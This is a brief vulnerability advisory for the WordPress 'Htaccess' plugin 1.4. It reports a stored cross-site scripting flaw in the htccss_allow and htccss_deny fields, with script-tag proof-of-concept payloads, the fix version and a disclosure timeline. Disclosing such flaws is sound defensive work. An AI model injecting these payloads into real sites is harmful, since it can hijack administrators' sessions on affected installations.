WordPress Htaccess plugin version 1.4 suffers from a cross site scripting vulnerability.
db4f8a3443fc12957055f41a4d7ed3fa6197eb1329a97a39b3e036a35db58714
Plugin Name : Htaccess
Effected Version : 1.4 (and most probably lower version's if any)
Vulnerability : A3-Cross-Site Scripting (XSS)
Identified by : Madhu Akula
Technical Details
Minimum Level of Access Required : Administrator
PoC - (Proof of Concept) :
The following fields put the payload as below
http://localhost/wp-admin/admin.php?page=htaccess.php
htccss_allow = “></textarea><script>alert(1)</script>
htccss_deny = “></textarea><script>alert(2)</script>
Vulnerable Parameter : htccss_allow, htccss_deny
Type of XSS : Stored
Fixed in : 1.5
http://wordpress.org/plugins/htaccess/changelog/
Disclosure Timeline
Vendor Contacted : 2014-08-04
Plugin Status : Updated on 2014-08-07
Public Disclosure : October 3, 2015
CVE Number : Not assigned yet
Plugin Description :
The plugin Htaccess allows to controll access to your website. Access can be controlled based on the client's hostname, IP address, or other characteristics of the client's request. It is very simple and has just two the directives like Allow and Deny.